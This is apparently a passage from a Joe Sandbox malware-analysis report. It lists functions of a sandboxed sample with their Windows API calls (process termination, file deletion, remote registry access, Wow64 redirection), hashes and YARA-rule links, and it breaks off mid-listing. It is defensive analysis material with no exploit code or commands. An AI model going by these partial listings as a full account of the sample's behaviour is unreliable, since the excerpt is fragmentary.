                • Instruction ID: 48d014eedfc1e5c38ad97c28b79aeee917ac2591eef03ed06bbde4985b290a7d
                • Opcode Fuzzy Hash: 74fa88ed494ffcf7ac621055c8208c605c3f3119b26a07c87e47582517635031
                • Instruction Fuzzy Hash: E3416C71910205EBDF04AF54DC85BAEB7B8FF45310B1880A9FE00AA256D774DE61DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C16178 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA5558,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BA559E
                • _wcslen.LIBCMT ref: 00C161D5
                • CoInitialize.OLE32(00000000), ref: 00C162EF
                • CoCreateInstance.OLE32(00C40CC4,00000000,00000001,00C40B34,?), ref: 00C16308
                • CoUninitialize.OLE32 ref: 00C16326
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 3172280962-24824748
                • Opcode ID: 4057d70f82f6099f260558c65cc5f2794a9a495673168c606bf991a4eecf3ebe
                • Instruction ID: 905742885606298e0c8b4e0ae7aebc647a5477f233d9215d585f5b42e90abc04
                • Opcode Fuzzy Hash: 4057d70f82f6099f260558c65cc5f2794a9a495673168c606bf991a4eecf3ebe
                • Instruction Fuzzy Hash: 7FD13571A082119FC714DF24C484A6ABBF5FF8A714F14889DF8969B361CB31ED85CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD3104 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,00000000,00BC4D73,00000000,?,?,00BC6902,?,?,00000000), ref: 00BD3108
                • _free.LIBCMT ref: 00BD313B
                • _free.LIBCMT ref: 00BD3163
                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD3170
                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD317C
                • _abort.LIBCMT ref: 00BD3182
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 8da7f9d36ab7a7cc16fddd24e91e89fb85241d026b8f75e875b6303ec1e7251f
                • Instruction ID: 8301c53e80a8e9b0f1ea9e46327891b9ab70e400978e794920c93550bce3d142
                • Opcode Fuzzy Hash: 8da7f9d36ab7a7cc16fddd24e91e89fb85241d026b8f75e875b6303ec1e7251f
                • Instruction Fuzzy Hash: 4DF02D3250490266C22223357C0AB1EA6F5DFD5F70F2444A7F415E23E3FFA08E014163
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C39383 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA1ED9: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BA1F33
                  • Part of subcall function 00BA1ED9: SelectObject.GDI32(?,00000000), ref: 00BA1F42
                  • Part of subcall function 00BA1ED9: BeginPath.GDI32(?), ref: 00BA1F59
                  • Part of subcall function 00BA1ED9: SelectObject.GDI32(?,00000000), ref: 00BA1F82
                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C393AD
                • LineTo.GDI32(?,00000003,00000000), ref: 00C393C1
                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C393CF
                • LineTo.GDI32(?,00000000,00000003), ref: 00C393DF
                • EndPath.GDI32(?), ref: 00C393EF
                • StrokePath.GDI32(?), ref: 00C393FF
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                • String ID:
                • API String ID: 43455801-0
                • Opcode ID: 58a62619126d24fe527e264aebbd2daf2302d21cdd734bceb0c32dbf35f13ac5
                • Instruction ID: 22b1ef84065e32e1b8532f752f65cf255663ea967721dcb84e6f1587d080e506
                • Opcode Fuzzy Hash: 58a62619126d24fe527e264aebbd2daf2302d21cdd734bceb0c32dbf35f13ac5
                • Instruction Fuzzy Hash: 7711DB7200010DBFDF129F95EC88F9E7FADEB08354F048051BA1A5A1A1D7719E55DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA3205 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                Download Yara Rule
                APIs
                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA3236
                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA323E
                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA3249
                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA3254
                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA325C
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA3264
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Virtual
                • String ID:
                • API String ID: 4278518827-0
                • Opcode ID: bdbae3ac2d07373f9748634216da9dcd5a0241293ee2a3933fc0a795ff4a80bb
                • Instruction ID: 79ea7669d77da966c26e6f274e8683b6a49c5db529907e1f89cb22433465c3e2
                • Opcode Fuzzy Hash: bdbae3ac2d07373f9748634216da9dcd5a0241293ee2a3933fc0a795ff4a80bb
                • Instruction Fuzzy Hash: 8C0148B0901B597DE3008F5A8C85B56FFA8FF19354F00411BA15C47941C7B5A864CBE5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0F34C Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C0F35C
                • SendMessageTimeoutW.USER32 ref: 00C0F372
                • GetWindowThreadProcessId.USER32(?,?), ref: 00C0F381
                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0F390
                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0F39A
                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0F3A1
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                • String ID:
                • API String ID: 839392675-0
                • Opcode ID: 249c7c285f913a0d2b7b018dc4a6cdf973623b994a7ea61e50cd7db7c8255b8e
                • Instruction ID: d0752a2588477cad1d6bbfd13214b09c7feba7c8dcb1b031b591ef5f56b1006e
                • Opcode Fuzzy Hash: 249c7c285f913a0d2b7b018dc4a6cdf973623b994a7ea61e50cd7db7c8255b8e
                • Instruction Fuzzy Hash: 89F05E32251158BBE7215B62AC0EFEF3F7CEFC6B21F000058F612E2090D7A06A42D6B5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BE349A Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                Download Yara Rule
                APIs
                • GetClientRect.USER32 ref: 00BE34B3
                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00BE34CA
                • GetWindowDC.USER32(?), ref: 00BE34D6
                • GetPixel.GDI32(00000000,?,?), ref: 00BE34E5
                • ReleaseDC.USER32 ref: 00BE34F7
                • GetSysColor.USER32(00000005), ref: 00BE3511
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                • String ID:
                • API String ID: 272304278-0
                • Opcode ID: cd6f0a0db8a09c159a637b2ee2190d50a7f15cbfd6cd90592cb7c03737f6d151
                • Instruction ID: 1a90554918d7ae842c4ecfd29d75d9748eb3d33954faee6ed48dfd3fd2fa7093
                • Opcode Fuzzy Hash: cd6f0a0db8a09c159a637b2ee2190d50a7f15cbfd6cd90592cb7c03737f6d151
                • Instruction Fuzzy Hash: C0015671510209EFDB119F60EC48BEE7BF5FF04321F5101A4F916A22A1CB310E51AF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C02104 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C0210F
                • UnloadUserProfile.USERENV(?,?), ref: 00C0211B
                • CloseHandle.KERNEL32(?), ref: 00C02124
                • CloseHandle.KERNEL32(?), ref: 00C0212C
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C02135
                • HeapFree.KERNEL32(00000000), ref: 00C0213C
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                • String ID:
                • API String ID: 146765662-0
                • Opcode ID: 1f5ee9a2c6b84e57e24488fa692415c8cb9d792082d7119b65adcc9b3093c566
                • Instruction ID: aa821830d47462dd6537dd60795e2f76b4f6d4694831be4ff601961ac5d8e9f0
                • Opcode Fuzzy Hash: 1f5ee9a2c6b84e57e24488fa692415c8cb9d792082d7119b65adcc9b3093c566
                • Instruction Fuzzy Hash: D0E0C276014101BBDA011BA1FD0CB0EBF39FB49322B104220F22682070CB329820DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C346DB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Menu$Item$DrawInfoInsert
                • String ID: 0
                • API String ID: 3076010158-4108050209
                • Opcode ID: 53a46c5f63711c1233e2ecffb62c52c8f956a3fb0b1bab279cbdc944ea772725
                • Instruction ID: fcbf26df70113ddda857e7a6a2ef930cc094a018f470de0e78ce972ac91ce51d
                • Opcode Fuzzy Hash: 53a46c5f63711c1233e2ecffb62c52c8f956a3fb0b1bab279cbdc944ea772725
                • Instruction Fuzzy Hash: 5F414775A20249EFDB24CF60E884AEABBF8FF06315F048129F91597290C730EE50CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C02672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C026F6
                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C02709
                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C02739
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$_wcslen$ClassName
                • String ID: ComboBox$ListBox
                • API String ID: 2081771294-1403004172
                • Opcode ID: cbd3af3efc48a881ba761e9754f16667715e49630646eee00668acd7259524ad
                • Instruction ID: 0821a8be610b9ca24de634744bffa6c82dddab477cd290bb6ac1caa142ebc450
                • Opcode Fuzzy Hash: cbd3af3efc48a881ba761e9754f16667715e49630646eee00668acd7259524ad
                • Instruction Fuzzy Hash: EC212771900108BFDB14AB74DC89EFFBBBCDF46750B144119F422A32E1CB784A0AD610
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BC50FD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BC50AE,?,?,00BC504E,?,00C698D8,0000000C,00BC51A5,?,00000002), ref: 00BC511D
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BC5130
                • FreeLibrary.KERNEL32(00000000,?,?,?,00BC50AE,?,?,00BC504E,?,00C698D8,0000000C,00BC51A5,?,00000002,00000000), ref: 00BC5153
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 3f3559a9304617ad8ffabd6c08c2f77811d44400fc9d86813ea36cd495e822ba
                • Instruction ID: 3b3d162bf2ba67228a55a4a6c9516758302d71e80e79ea5146125946eb01502a
                • Opcode Fuzzy Hash: 3f3559a9304617ad8ffabd6c08c2f77811d44400fc9d86813ea36cd495e822ba
                • Instruction Fuzzy Hash: FDF06231A50208BBDB219F94EC49FADBFF5EF04752F0800A8F806B2160DB70AD90CA95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA6332 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BA637F,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA633E
                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BA6350
                • FreeLibrary.KERNEL32(00000000,?,?,00BA637F,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6362
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                • API String ID: 145871493-3689287502
                • Opcode ID: e748dd8d77ff775dbf10f8f3b89817646c9ac81b7fbd3473712e51fbc0ddd59e
                • Instruction ID: 7c720aec694780704c003de7cae90463600806f5397c95f931d73762a80f4d9f
                • Opcode Fuzzy Hash: e748dd8d77ff775dbf10f8f3b89817646c9ac81b7fbd3473712e51fbc0ddd59e
                • Instruction Fuzzy Hash: 69E08636616B211B962117197C08B5F7798EF93B627090065F902D2100DBB0CC0284F4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA62FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BE54C3,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6304
                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BA6316
                • FreeLibrary.KERNEL32(00000000,?,?,00BE54C3,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6329
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                • API String ID: 145871493-1355242751
                • Opcode ID: 2daf4f9518429e36cd282b7d5ae25e8231690167502b89a0c446fc8ba8c2a40d
                • Instruction ID: 286463b53d897589a656badd8b46239a7196e413e1244150e37490b73b3efcbf
                • Opcode Fuzzy Hash: 2daf4f9518429e36cd282b7d5ae25e8231690167502b89a0c446fc8ba8c2a40d
                • Instruction Fuzzy Hash: 64D012366665216746322739BC18B8E7F94DE87F6134900A5B802A2168CF60CD0289D4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C1321B Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                Download Yara Rule
                APIs
                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C134D9
                • DeleteFileW.KERNEL32(?), ref: 00C1355B
                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C13571
                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C13582
                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C13594
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: File$Delete$Copy
                • String ID:
                • API String ID: 3226157194-0
                • Opcode ID: 392e78d30d01a9bab569211b5dddd0cace2694ff1fa9ff08d105b94923b485ce
                • Instruction ID: a250ffea1372ed013a518f528b5de76c64e254bebbc50f85032f3a0064eef0f0
                • Opcode Fuzzy Hash: 392e78d30d01a9bab569211b5dddd0cace2694ff1fa9ff08d105b94923b485ce
                • Instruction Fuzzy Hash: D0B14DB2D00119ABDF11DBA4CC85EDEBBBDEF5A714F0040AAF509E6141EA309B849F60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C2C328 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C2D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2C00D,?,?), ref: 00C2D314
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D350
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3C7
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3FD
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C404
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C2C45F
                • RegEnumKeyExW.ADVAPI32 ref: 00C2C4C2
                • RegCloseKey.ADVAPI32(?,?), ref: 00C2C505
